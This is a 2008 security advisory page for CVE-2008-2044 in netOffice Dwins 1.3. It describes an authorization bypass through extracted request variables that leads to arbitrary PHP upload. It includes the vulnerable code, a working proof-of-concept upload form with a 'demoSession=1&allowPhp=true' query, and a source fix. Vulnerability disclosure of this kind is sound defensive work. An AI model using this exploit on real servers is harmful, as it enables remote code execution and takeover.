|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 3845 CVE : CVE-2008-2044 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : db Published : 01.05.2008
Advisory Text : netOffice Dwins 1.3 Remote code execution. -------------------------------------------------------- Product: netOffice Dwins Version: 1.3 p2 Vendor: http://netofficedwins.sourceforge.net/ Date: 02/29/08 - Introduction "netOffice Dwins is a free web based time tracking, timesheet, and project management environment." - Details It is possible for an attacker to bypass authorization, upload arbitrary PHP files, and then execute them on the server. netOffice extracts all GET, POST, SESSION, SERVER, and COOKIE parameters into the local variable space. This has the same effect as turning on register globals. The code below is from includes/library.php. //GET array if (!empty($_GET)) { extract($_GET); } else if (!empty($HTTP_GET_VARS)) { extract($HTTP_GET_VARS); } This lets an attacker set demoSession=1 to bypass authorization and freely access any part of the application. Setting the variable to one bypasses the first check ($demoSession != true) but the second boolean expression ($demoSession == 'true') evaluates to false thereby not initializing the action variable to an empty string. // check session validity, except for demo user if (($checkSession == true) && ($demoSession != true)) { // a client user trying to get outside of the "client project site" if (($profilSession == 3) && (!strstr($_SERVER['PHP_SELF'], 'projects_site'))) { header('Location: ../index.php?session=false'); exit; } // disable actions if demo user logged in demo mode if (!empty($action)) { if ($demoSession == 'true') { echo "true"; $closeTopic = ''; $addToSiteTask = ''; $removeToSiteTask = ''; $addToSiteTopic = ''; $removeToSiteTopic = ''; $addToSiteTeam = ''; $removeToSiteTeam = ''; $action = ''; $msg = 'demo'; } } Next an attacker could use access the uploadfile.php form without logging in to upload and execute PHP files. Normally php files are not allowed unless the allowPhp variable is set to true. - Proof of Concept <form accept-charset="UNKNOWN" method="POST" action="http://target/netoffice/projects_site/uploadfile.php?demoSession =1&allowPhp=true&action=add&project=&task=#filedetailsAnchor" name="feeedback" enctype="multipart/form-data"> <input type="hidden" name="MAX_FILE_SIZE" value="100000000"><input type="hidden" name="maxCustom" value=""> <table cellpadding="3" cellspacing="0" border="0"> <tr><th colspan="2">Upload Form</th></tr> <tr><th>Comments :</th><td><textarea cols="60" name="commentsField" rows="6"></textarea></td></tr> <tr><th>Upload :</th><td><input size="35" value="" name="upload" type="file"></td></tr> <tr><th> </th><td><input name="submit" type="submit" value="Save"><br><br></td></tr></table> </form> - Solution Authors were notified on 2/19, no fix is currently available. Edit the source to prevent authorization bypass. in includes/library.php change if ($demoSession == 'true') { to if ($demoSession == true) { Author: dB Email: dB [at] rawsecurity.org Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache (mod_status) |
||
» Apache (mod_proxy_ftp) |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |